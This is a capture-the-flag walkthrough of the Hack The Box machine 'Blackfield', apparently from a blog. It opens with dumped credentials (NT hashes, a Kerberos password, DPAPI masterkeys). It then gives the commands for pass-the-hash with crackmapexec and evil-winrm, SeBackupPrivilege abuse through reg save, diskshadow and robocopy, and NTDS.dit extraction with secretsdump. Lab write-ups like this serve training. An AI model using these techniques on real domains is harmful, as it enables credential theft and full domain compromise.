		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5f55]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 24294 (5ee6)
session_id 0
username UMFD-0
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.554117+00:00
sid S-1-5-96-0-0
luid 24294
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5ee6]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5ee6]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 24282 (5eda)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.554117+00:00
sid S-1-5-96-0-1
luid 24282
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5eda]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5eda]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 22028 (560c)
session_id 0
username 
domainname 
logon_server 
logon_time 2020-02-23T17:57:44.959593+00:00
sid None
luid 22028
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA

== LogonSession ==
authentication_id 999 (3e7)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:57:44.913221+00:00
sid S-1-5-18
luid 999
	== WDIGEST [3e7]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: dc01$
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [3e7]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== DPAPI [3e7]==
		luid 999
		key_guid 0f7e926c-c502-4cad-90fa-32b78425b5a9
		masterkey ebbb538876be341ae33e88640e4e1d16c16ad5363c15b0709d3a97e34980ad5085436181f66fa3a0ec122d461676475b24be001736f920cd21637fee13dfc616
		sha1_masterkey ed834662c755c50ef7285d88a4015f9c5d6499cd
	== DPAPI [3e7]==
		luid 999
		key_guid f611f8d0-9510-4a8a-94d7-5054cc85a654
		masterkey 7c874d2a50ea2c4024bd5b24eef4515088cf3fe21f3b9cafd3c81af02fd5ca742015117e7f2675e781ce7775fcde2740ae7207526ce493bdc89d2ae3eb0e02e9
		sha1_masterkey cf1c0b79da85f6c84b96fd7a0a5d7a5265594477
	== DPAPI [3e7]==
		luid 999
		key_guid 31632c55-7a7c-4c51-9065-65469950e94e
		masterkey 825063c43b0ea082e2d3ddf6006a8dcced269f2d34fe4367259a0907d29139b58822349e687c7ea0258633e5b109678e8e2337d76d4e38e390d8b980fb737edb
		sha1_masterkey 6f3e0e7bf68f9a7df07549903888ea87f015bb01
	== DPAPI [3e7]==
		luid 999
		key_guid 7e0da320-072c-4b4a-969f-62087d9f9870
		masterkey 1fe8f550be4948f213e0591eef9d876364246ea108da6dd2af73ff455485a56101067fbc669e99ad9e858f75ae9bd7e8a6b2096407c4541e2b44e67e4e21d8f5
		sha1_masterkey f50955e8b8a7c921fdf9bac7b9a2483a9ac3ceed

Administrator hash

svc_backup hash

Initial Access:

  • Sprayed both the NTLM hashes using crackmapexec on to the DC but found a green flag with svc_backup.

crackmapexec smb 10.10.10.192 -u "Administrator" -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

crackmapexe hash spray

crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

crackmapexe hash spray

  • Used Evil-WinRM to get initial foothold using svc_backup hash and captured the user flag.

evil-winrm.rb -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

got shel via evilwinrm

user flag

  • I was able to peek inside the Administrator home directory but was unable to capture the root flag.

Administrator home directory

cannot read root.txt

  • Next, i checked the permissions for our current user and found an Interesting one enabled – SeBackupPrivilege.

whoami /all

checking user privileges and groups

  • Also looked inside a notes.txt file in C directory which reveal some hints about performing some backup.

notes.txt

  • Looked into the account information for user svc_backup and found that it is part of “Backup Operators” group. With SEBackupPrivilege enabled and the user being part of the Backup Operators group, we will be able to escalate our privileges by taking backup of the SAM or NTDS.dit file and then dumping password hashes from it. So, let’s perform it then.

net user svc_backup

Backup Operators group found

Privilege Escalation:

  • Made a directory named temp and used the registry to save a copy of the SAM and System files to our temp directory.

cd Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

saving sam and system files

  • Downloaded the files to our local machine. This might take a while.

downloading sam and system files

  • Used pypykatz to dump the contents of the SAM and system file and we got some hashes.

pypykatz registry --sam sam system

dumping creds using pypykatz

  • I tried to get a shell as Administrator with the dumped hash but got denied. That means, we have to now dump the hashes from NTDS.dit file.

unable to get shell

  • Used the below commands and save it to a file name diskshadow.txt. With these commands, we are setting up a drive Z as a copy of the C drive using diskshadow and then mounting it to the filesystem.

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append        
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

creating diskshadow.txt

diskshadow.exe /s c:\temp\diskshadow.txt

executing diskshadow

  • Next, used the robocopy utility to copy the NTDS.dit file to our temp directory from our generated Z drive which holds a copy of C.

cd Z:
cd windows
cd ntds
robocopy /b .\ C:\temp NTDS.dit

robocoby the NTDS.dit file

  • Also saved the system.bak file to our temp directory.

cd C:\Temp
reg.exe save hklm\system C:\temp\system.bak

saving system file

  • Downloaded both the file to our local machine. This might take a lot of time. So, go ahead and have some Kool-Aid.

downloading ntds.dit and system.bak

  • Once downloaded, used secretsdump.py to dump the contents of the NTDS file and thus got the Administrator’s password hash.

secretsdump.py -ntds ntds.dit -system system.bak LOCAL > hashes.txt

dumping hashes with secretsdump

  • At last, used Evil-WinRM to get shell access as administrator and captured the root flag.

evil-winrm.rb -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee

got root and root flag

machine completed

Also Read: HTB – APT

Conclusion:

Conclusion

So that was “Blackfield” for you. This machine covers exploitation of Windows and Active Directory misconfigurations. Initially, Anonymous / Guest access to an SMB share was used to enumerate users. Once the user was found to have Kerberos pre-authentication disabled, we conducted an ASREPRoasting attack. This allowed us to retrieve a hash of the encrypted material contained in the AS-REP, which was then cracked via an offline brute force attack. With this user creds, we accessed a SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group were then used to dump the Active Directory database, and retrieved the hash of the primary domain administrator. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top